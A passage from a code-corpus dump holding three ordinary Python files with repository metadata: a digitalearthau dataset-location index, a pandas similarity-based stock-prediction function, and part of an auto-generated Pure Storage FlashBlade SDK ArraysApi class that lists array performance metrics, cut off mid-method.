| no_license | benjimin/digitalearthau | 2d3010be76fad0d0b6b4854dbbad07e98254b239 | 5098bf3c88627cad78a8caa5ab703c586c17a6f7 | refs/heads/develop | 2022-02-27T07:36:16.009689 | 2017-09-14T05:51:27 | 2017-09-14T05:51:27 | 103,460,937 | 0 | 0 | null | 2017-09-13T23:10:15 | 2017-09-13T23:10:15 | null | UTF-8 | Python | false | false | 7,353 | py | import collections
import uuid
from datetime import datetime
from typing import Iterable, Optional, Mapping, List
from datacube.index import index_connect
from datacube.index._api import Index
from datacube.model import Dataset
from datacube.scripts import dataset as dataset_script
from datacube.utils import uri_to_local_path
from digitalearthau.utils import simple_object_repr
class DatasetLite:
    """
    A small subset of datacube.model.Dataset.

    A "real" dataset needs a lot of initialisation: types etc, so this is easier to test with.

    We also, in this script, depend heavily on the __eq__ behaviour of this particular class (by id only), and subtle
    bugs could occur if the core framework made changes to it.
    """

    def __init__(self, id_: uuid.UUID, archived_time: Optional[datetime] = None) -> None:
        # Sanity check of the type, as our equality checks are quietly wrong if the types don't match,
        # and we've previously had problems with libraries accidentally switching string/uuid types...
        assert isinstance(id_, uuid.UUID)
        self.id = id_
        self.archived_time = archived_time

    @property
    def is_archived(self):
        """
        Is this dataset archived?

        (an archived dataset is one that is not intended to be used by users anymore: eg. it has been
        replaced by another dataset. It will not show up in search results, but still exists in the
        system via provenance chains or through id lookup.)

        :rtype: bool
        """
        return self.archived_time is not None

    def __eq__(self, other):
        """Equality is by id only (see class docstring)."""
        if other is None:
            return False
        # Fix: comparing against an unrelated object used to raise
        # AttributeError (other.id). Returning NotImplemented lets Python
        # fall back to its default comparison instead.
        if not hasattr(other, 'id'):
            return NotImplemented
        return self.id == other.id

    def __hash__(self):
        # Consistent with __eq__: hash by id only.
        return hash(self.id)

    @classmethod
    def from_agdc(cls, dataset: 'Dataset'):
        """Build a DatasetLite from a full datacube Dataset."""
        # (string annotation keeps this module importable without datacube)
        return DatasetLite(dataset.id, archived_time=dataset.archived_time)

    def __repr__(self):
        return simple_object_repr(self)
class DatasetPathIndex:
    """
    An index of datasets and their URIs.

    This is a slightly questionable attempt to make testing/mocking simpler.

    There's two implementations: One in-memory and one that uses a real datacube.
    (MemoryDatasetPathIndex and AgdcDatasetPathIndex)
    """

    def iter_all_uris(self, query: dict) -> Iterable[str]:
        """Yield every known uri matching *query*."""
        raise NotImplementedError

    def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
        """Yield the datasets recorded at *uri*."""
        raise NotImplementedError

    def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
        """Look up a dataset by id; None when unknown."""
        raise NotImplementedError

    def add_location(self, dataset: DatasetLite, uri: str) -> bool:
        """Record *uri* for a known dataset. Returns True if newly added."""
        raise NotImplementedError

    def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
        """Forget *uri* for a dataset. Returns True if it was removed."""
        raise NotImplementedError

    def add_dataset(self, dataset: DatasetLite, uri: str):
        """Index a dataset found at *uri*."""
        raise NotImplementedError

    def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
        """Map of all datasets to their uri list. Convenience method for tests"""
        raise NotImplementedError

    def close(self):
        """Do any clean-up as needed before forking."""
        # Default implementation: no-op
        pass
class AgdcDatasetPathIndex(DatasetPathIndex):
    """DatasetPathIndex backed by a real datacube Index connection."""

    def __init__(self, index: Index) -> None:
        super().__init__()
        self._index = index
        # Dataset-matching rules derived from the index's product types.
        self._rules = dataset_script.load_rules_from_types(self._index)

    def iter_all_uris(self, query: dict) -> Iterable[str]:
        """Yield the uri of every dataset matching *query*."""
        for uri, in self._index.datasets.search_returning(['uri'], **query):
            yield str(uri)

    @classmethod
    def connect(cls) -> 'AgdcDatasetPathIndex':
        """Open a new datacube connection and wrap it."""
        return cls(index_connect(application_name='digitalearthau-pathsync'))

    def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
        for d in self._index.datasets.get_datasets_for_location(uri=uri):
            yield DatasetLite.from_agdc(d)

    def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
        was_removed = self._index.datasets.remove_location(dataset.id, uri)
        return was_removed

    def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
        agdc_dataset = self._index.datasets.get(dataset_id)
        return DatasetLite.from_agdc(agdc_dataset) if agdc_dataset else None

    def add_location(self, dataset: DatasetLite, uri: str) -> bool:
        # NOTE(review): variable name says "removed" but this *adds* a
        # location -- the value returned is whether it was added.
        was_removed = self._index.datasets.add_location(dataset.id, uri)
        return was_removed

    def add_dataset(self, dataset: DatasetLite, uri: str):
        """Load datasets from the local path of *uri* and index the one
        whose id matches *dataset*; raise if it isn't found there."""
        path = uri_to_local_path(uri)

        for d in dataset_script.load_datasets([path], self._rules):
            if d.id == dataset.id:
                self._index.datasets.add(d, sources_policy='ensure')
                break
        else:
            raise RuntimeError('Dataset not found at path: %s, %s' % (dataset.id, uri))

    def close(self):
        self._index.close()

    def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
        """
        All contained (dataset, [location]) values, to check test results.
        """
        return dict(
            (
                DatasetLite(dataset.id),
                tuple(dataset.uris)
            )
            for dataset in self._index.datasets.search()
        )

    def __enter__(self):
        return self

    def __exit__(self, type_, value, traceback):
        self.close()
class MemoryDatasetPathIndex(DatasetPathIndex):
    """
    An in-memory implementation, so that we can test without using a real datacube index.
    """

    def __init__(self):
        super().__init__()
        # dataset -> list of uris recorded for it.
        self._records = collections.defaultdict(list)  # type: Mapping[DatasetLite, List[str]]

    def reset(self):
        """Drop all recorded datasets and locations."""
        self._records = collections.defaultdict(list)

    def get(self, dataset_id: uuid.UUID) -> Optional[DatasetLite]:
        """Find a recorded dataset by id; None when unknown."""
        return next((d for d in self._records if d.id == dataset_id), None)

    def iter_all_uris(self, query: dict) -> Iterable[str]:
        # The query is ignored by the in-memory implementation.
        for locations in self._records.values():
            yield from locations

    def add_location(self, dataset: DatasetLite, uri: str) -> bool:
        if dataset not in self._records:
            raise ValueError("Unknown dataset {} -> {}".format(dataset.id, uri))

        return self._add(dataset, uri)

    def _add(self, key, uri):
        locations = self._records[key]
        if uri in locations:
            return False  # Already present: not added.
        locations.append(uri)
        return True

    def remove_location(self, dataset: DatasetLite, uri: str) -> bool:
        locations = self._records[dataset]
        if uri not in locations:
            return False  # Not recorded: nothing removed.
        # Only the uri is dropped; the dataset key itself always remains.
        locations.remove(uri)
        return True

    def get_datasets_for_uri(self, uri: str) -> Iterable[DatasetLite]:
        return (dataset
                for dataset, locations in self._records.items()
                if uri in locations)

    def as_map(self) -> Mapping[DatasetLite, Iterable[str]]:
        """
        All contained (dataset, [location]) values, to check test results.
        """
        return {dataset: tuple(locations) for dataset, locations in self._records.items()}

    def add_dataset(self, dataset: DatasetLite, uri: str):
        # Datasets themselves aren't stored here, only their locations.
        return self._add(dataset, uri)
| [
"[email protected]"
]
| |
b7a6cb5c45e46e496ff9ac7299b59ead5a70c670 | 6809cda579a7c1c88872f566d65f665c2dff20bb | /archive3/lib/prediction.py | 43f01be6f1370c641d2afae4f8720168f3c9e38e | []
| no_license | hellojixian/stock-dummy | edb3e7447e26ec3e0481c938fcf8f72063d6c850 | 06b352ba3d78ac419e7672b0e6ec630f6f461ae8 | refs/heads/master | 2020-06-15T09:11:33.401689 | 2019-11-05T15:46:43 | 2019-11-05T15:46:43 | 195,256,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,043 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
import pandas as pd
import sys,os,datetime,time
import gc
# 强制转换成整数 为了加速搜索 至少减少内存消耗了
def optimize_df(df):
    """Shrink a knowledge-base frame to speed up searching / cut memory.

    Every column is cast to int8 ('b'), except the two float outcome
    columns ('future_profit', 'future_risk'), whose original values are
    restored afterwards. Returns a new frame; the argument is not mutated.

    Note: astype('b') will raise if a feature column holds values outside
    the int8 range.
    """
    # (removed unused 'int_cols' local from the original)
    float_cols = ['future_profit', 'future_risk']
    preserved_floats = df[float_cols].copy()
    df = df.astype('b')
    df[float_cols] = preserved_floats
    return df
def predict(sample, kb):
    """Predict future profit/risk stats for *sample* by finding similar
    rows in the knowledge base *kb* (a DataFrame of int8 feature columns
    plus float 'future_profit'/'future_risk' -- see optimize_df).

    Strategy: build a boolean filter that brackets each feature around the
    sample's value, widening the brackets until more than 10 rows match,
    then rank matches by L1 similarity and aggregate their outcomes.
    Returns a pandas Series of prediction stats.
    """
    start_timestamp = time.time()
    future = ['future_profit','future_risk']
    # L1 distance between a kb row and the sample (applied with raw=True,
    # so v is a numpy array of the row's values).
    def _check_similarity_loss(v, sample):
        return np.abs(v-sample).sum()
    # Per-feature [min, max] clamp for how far the bracket may widen.
    # [0, 0] means the feature must match the sample exactly.
    filters_setting = {
        'prev0_change' :[ 0, 0],
        'prev1_change' :[ 0, 0],
        'prev2_change' :[ 0, 0],
        'trend_5' :[ 0, 0],
        'trend_10' :[ 0, 0],
        'prev0_bar' :[-1, 1],
        'trend_30' :[-1, 1],
        'pos_5' :[-1, 1],
        'pos_10' :[-1, 1],
        'pos_30' :[-1, 1],
        'prev4_change' :[-1, 1],
        'trend_120' :[-1, 1],
        'pos_120' :[-1, 1],
        'amp_5' :[-2, 2],
        'risk_10' :[-1, 1],
        'risk_20' :[-2, 2],
        'amp_30' :[-3, 3],
        'prev0_open_c' :[-2, 2],
        'prev1_open_c' :[-2, 2],
        'prev1_bar' :[-2, 2],
        'prev0_up_line' :[-2, 2],
        'prev0_down_line' :[-2, 2],
    }
    filters = filters_setting.copy()
    # NOTE(review): this first assignment is dead -- it is overwritten by
    # 'filter_limit=2' below before being read.
    filter_limit = 0
    factors = list(filters.keys())
    filter_limit=2
    filter_offest=1
    # Widen the per-feature brackets until enough (>10) kb rows match,
    # or the offset limit is reached.
    while filter_offest<filter_limit:
        _filter = ""
        for f in factors:
            # Clamp the candidate offset into the feature's allowed range.
            offest = np.clip([-filter_offest, filter_offest], filters[f][0], filters[f][1])
            _filter += "({}>={}) & ({}<={}) &".format(
                f,int(sample[f]+offest[0]),
                f,int(sample[f]+offest[1]))
        # Trim the trailing '&' before evaluating the query.
        _filter = _filter[:-1]
        rs = kb[kb.eval(_filter)].copy()
        if len(rs)<=10:
            filter_offest +=1
        else:
            break
    pred = pd.Series()
    kb_sample_count = rs.shape[0]
    reduced_sample_count = 0
    if kb_sample_count >10:
        pred['result'] = True
        # Keep only the 20 nearest rows within a similarity budget of 15.
        rs['similarity_loss'] = rs.apply(func=_check_similarity_loss, args=[sample], raw=True, axis=1)
        rs = rs.sort_values(by=['similarity_loss'],ascending=True)
        rs = rs[rs.similarity_loss<=15]
        rs = rs[:20]
        reduced_sample_count = rs.shape[0]
        if reduced_sample_count<=2:
            pred['result'] = False
        # Aggregate outcome stats: mean plus the configured quantiles.
        for f in future:
            pred['{}_mean'.format(f)] = rs[f].mean()
            settings = {'med':0.5}
            for k in settings:
                v = settings[k]
                pred['{}_{}'.format(f,k)] = rs[f].quantile(v)
        pred['similarity_loss'] = rs['similarity_loss'].max()
    else:
        pred['result'] = False
        pred['similarity_loss'] = float('nan')
    pred['samples_count'] = int(kb_sample_count)
    pred['reduced_count'] = int(reduced_sample_count)
    # 'durtion' (sic) is kept as-is: renaming the key would break consumers.
    pred['durtion'] = np.round((time.time() - start_timestamp),2)
    return pred
| [
"[email protected]"
]
| |
19ebe0e0280c2829c58678866cdc0eb3a1da7611 | bbe6f37f7347cb83f08846d505ac4aa6bc0031e6 | /purity_fb/purity_fb_1dot9/apis/arrays_api.py | 7bd8335e17e2cf1d85d4d5361d2a51ff900af97e | [
"Apache-2.0"
]
| permissive | bsamz-ps/purity_fb_python_client | 02ff7213075cf1948e2db7b0835cc5fcc56f328a | 11f27ef0c72d8aac1fc4e1ed036cca038b85dfa4 | refs/heads/master | 2021-02-19T08:11:04.042758 | 2020-02-12T23:56:08 | 2020-02-12T23:56:08 | 245,294,511 | 0 | 0 | NOASSERTION | 2020-03-06T00:14:27 | 2020-03-06T00:14:26 | null | UTF-8 | Python | false | false | 43,419 | py | # coding: utf-8
"""
Pure Storage FlashBlade REST 1.9 Python SDK
Pure Storage FlashBlade REST 1.9 Python SDK. Compatible with REST API versions 1.0 - 1.9. Developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.9
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ArraysApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
    def __init__(self, api_client=None):
        """Create the API wrapper.

        :param api_client: optional pre-configured ApiClient; when omitted,
            the shared client from the global Configuration is used
            (lazily created on first use).
        """
        config = Configuration()
        if api_client:
            self.api_client = api_client
        else:
            # Fall back to the globally shared client, creating it on demand.
            if not config.api_client:
                config.api_client = ApiClient()
            self.api_client = config.api_client
def list_arrays(self, **kwargs):
"""
List arrays
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: ArrayResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_with_http_info(**kwargs)
else:
(data) = self.list_arrays_with_http_info(**kwargs)
return data
    def list_arrays_with_http_info(self, **kwargs):
        """
        List arrays
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>> pprint(response)
        >>>
        >>> thread = api.list_arrays_with_http_info(callback=callback_function)

        :param callback function: The callback function
         for asynchronous request. (optional)
        :return: ArrayResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        # Only framework-level kwargs are accepted by this endpoint.
        all_params = []
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated-code idiom: use locals() as the params dict, then merge
        # in the validated kwargs and drop the raw kwargs entry.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_arrays" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # Authentication setting
        auth_settings = ['AuthTokenHeader']

        return self.api_client.call_api('/1.9/arrays', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ArrayResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def list_arrays_http_specific_performance(self, **kwargs):
"""
List instant or historical http specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_http_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayHttpPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_http_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_http_specific_performance_with_http_info(**kwargs)
return data
    def list_arrays_http_specific_performance_with_http_info(self, **kwargs):
        """
        List instant or historical http specific performance
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>> pprint(response)
        >>>
        >>> thread = api.list_arrays_http_specific_performance_with_http_info(callback=callback_function)

        :param callback function: The callback function
         for asynchronous request. (optional)
        :param int start_time: Time to start sample in milliseconds since epoch.
        :param int end_time: Time to end sample in milliseconds since epoch.
        :param int resolution: sample frequency in milliseconds
        :return: ArrayHttpPerformanceResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        # Endpoint-specific query kwargs plus the framework-level ones.
        all_params = ['start_time', 'end_time', 'resolution']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated-code idiom: use locals() as the params dict, then merge
        # in the validated kwargs and drop the raw kwargs entry.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_arrays_http_specific_performance" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Optional sampling window/frequency are passed as query params.
        query_params = []
        if 'start_time' in params:
            query_params.append(('start_time', params['start_time']))
        if 'end_time' in params:
            query_params.append(('end_time', params['end_time']))
        if 'resolution' in params:
            query_params.append(('resolution', params['resolution']))

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['AuthTokenHeader']

        return self.api_client.call_api('/1.9/arrays/http-specific-performance', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ArrayHttpPerformanceResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def list_arrays_nfs_specific_performance(self, **kwargs):
"""
List instant or historical nfs specific performance
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.list_arrays_nfs_specific_performance(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int start_time: Time to start sample in milliseconds since epoch.
:param int end_time: Time to end sample in milliseconds since epoch.
:param int resolution: sample frequency in milliseconds
:return: ArrayNfsPerformanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
else:
(data) = self.list_arrays_nfs_specific_performance_with_http_info(**kwargs)
return data
    def list_arrays_nfs_specific_performance_with_http_info(self, **kwargs):
        """
        List instant or historical nfs specific performance
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>> pprint(response)
        >>>
        >>> thread = api.list_arrays_nfs_specific_performance_with_http_info(callback=callback_function)

        :param callback function: The callback function
         for asynchronous request. (optional)
        :param int start_time: Time to start sample in milliseconds since epoch.
        :param int end_time: Time to end sample in milliseconds since epoch.
        :param int resolution: sample frequency in milliseconds
        :return: ArrayNfsPerformanceResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """

        # Endpoint-specific query kwargs plus the framework-level ones.
        all_params = ['start_time', 'end_time', 'resolution']
        all_params.append('callback')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Generated-code idiom: use locals() as the params dict, then merge
        # in the validated kwargs and drop the raw kwargs entry.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method list_arrays_nfs_specific_performance" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        # Optional sampling window/frequency are passed as query params.
        query_params = []
        if 'start_time' in params:
            query_params.append(('start_time', params['start_time']))
        if 'end_time' in params:
            query_params.append(('end_time', params['end_time']))
        if 'resolution' in params:
            query_params.append(('resolution', params['resolution']))

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['AuthTokenHeader']

        return self.api_client.call_api('/1.9/arrays/nfs-specific-performance', 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='ArrayNfsPerformanceResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        _preload_content=params.get('_preload_content', True),
                                        _request_timeout=params.get('_request_timeout'),
                                        collection_formats=collection_formats)
def list_arrays_performance(self, **kwargs):
    """List instant or historical array performance.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param int start_time: time to start sample, milliseconds since epoch
    :param int end_time: time to end sample, milliseconds since epoch
    :param int resolution: sample frequency in milliseconds
    :param str protocol: sample performance of a certain protocol only
    :return: ArrayPerformanceResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.list_arrays_performance_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(**kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(**kwargs)
def list_arrays_performance_with_http_info(self, **kwargs):
    """
    List instant or historical array performance.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_arrays_performance_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int start_time: Time to start sample in milliseconds since epoch.
    :param int end_time: Time to end sample in milliseconds since epoch.
    :param int resolution: sample frequency in milliseconds
    :param str protocol: to sample performance of a certain protocol
    :return: ArrayPerformanceResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['start_time', 'end_time', 'resolution', 'protocol']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_arrays_performance" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only forward query parameters the caller explicitly supplied.
    query_params = []
    if 'start_time' in params:
        query_params.append(('start_time', params['start_time']))
    if 'end_time' in params:
        query_params.append(('end_time', params['end_time']))
    if 'resolution' in params:
        query_params.append(('resolution', params['resolution']))
    if 'protocol' in params:
        query_params.append(('protocol', params['protocol']))

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays/performance', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ArrayPerformanceResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def list_arrays_performance_replication(self, **kwargs):
    """List instant or historical array replication performance.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param int end_time: time to end sample, milliseconds since epoch
    :param int resolution: sample frequency in milliseconds
    :param int start_time: time to start sample, milliseconds since epoch
    :param str type: sample file systems, object store, or all
    :return: ArrayPerformanceReplicationResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.list_arrays_performance_replication_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(**kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(**kwargs)
def list_arrays_performance_replication_with_http_info(self, **kwargs):
    """
    List instant or historical array replication performance.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_arrays_performance_replication_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int end_time: Time to end sample in milliseconds since epoch.
    :param int resolution: sample frequency in milliseconds
    :param int start_time: Time to start sample in milliseconds since epoch.
    :param str type: to sample space of either file systems, object store, or all
    :return: ArrayPerformanceReplicationResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['end_time', 'resolution', 'start_time', 'type']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_arrays_performance_replication" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only forward query parameters the caller explicitly supplied.
    query_params = []
    if 'end_time' in params:
        query_params.append(('end_time', params['end_time']))
    if 'resolution' in params:
        query_params.append(('resolution', params['resolution']))
    if 'start_time' in params:
        query_params.append(('start_time', params['start_time']))
    if 'type' in params:
        query_params.append(('type', params['type']))

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.\
        select_header_accept(['application/json'])

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['application/json'])

    # Authentication setting
    auth_settings = ['AuthTokenHeader']

    return self.api_client.call_api('/1.9/arrays/performance/replication', 'GET',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='ArrayPerformanceReplicationResponse',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def list_arrays_s3_specific_performance(self, **kwargs):
    """List instant or historical object store specific performance.

    Synchronous by default. Supplying a ``callback`` keyword makes the
    request asynchronous: the callback receives the response and the
    request thread is returned instead of the data.

    :param callback function: callback for asynchronous request (optional)
    :param int start_time: time to start sample, milliseconds since epoch
    :param int end_time: time to end sample, milliseconds since epoch
    :param int resolution: sample frequency in milliseconds
    :return: ArrayS3PerformanceResponse, or the request thread when async
    """
    # This convenience wrapper only surfaces the deserialized body.
    kwargs['_return_http_data_only'] = True
    delegate = self.list_arrays_s3_specific_performance_with_http_info
    if not kwargs.get('callback'):
        # Synchronous path: hand the deserialized data straight back.
        return delegate(**kwargs)
    # Asynchronous path: the delegate returns the request thread.
    return delegate(**kwargs)
def list_arrays_s3_specific_performance_with_http_info(self, **kwargs):
    """
    List instant or historical object store specific performance.

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please define a `callback` function
    to be invoked when receiving the response.

    >>> def callback_function(response):
    >>>     pprint(response)
    >>>
    >>> thread = api.list_arrays_s3_specific_performance_with_http_info(callback=callback_function)

    :param callback function: The callback function
        for asynchronous request. (optional)
    :param int start_time: Time to start sample in milliseconds since epoch.
    :param int end_time: Time to end sample in milliseconds since epoch.
    :param int resolution: sample frequency in milliseconds
    :return: ArrayS3PerformanceResponse
        If the method is called asynchronously,
        returns the request thread.
    """
    # Keyword arguments accepted by this endpoint, plus the generic
    # request-control options shared by every generated method.
    all_params = ['start_time', 'end_time', 'resolution']
    all_params.append('callback')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')

    params = locals()
    # Fail fast on any keyword argument the endpoint does not recognise.
    # NOTE: mutating the locals() mapping relies on it being a plain dict
    # (CPython behavior).
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_arrays_s3_specific_performance" % key
            )
        params[key] = val
    del params['kwargs']

    collection_formats = {}

    path_params = {}

    # Only forward query parameters the caller explicitly supplied.
    query_params = []
    if 'start_time' in params:
        query_params.append(('start_time', params['start_time']))
    if 'end_time' in params:
        query_params.append(('end_time', params['end_time']))
    if 'resolution' in params:
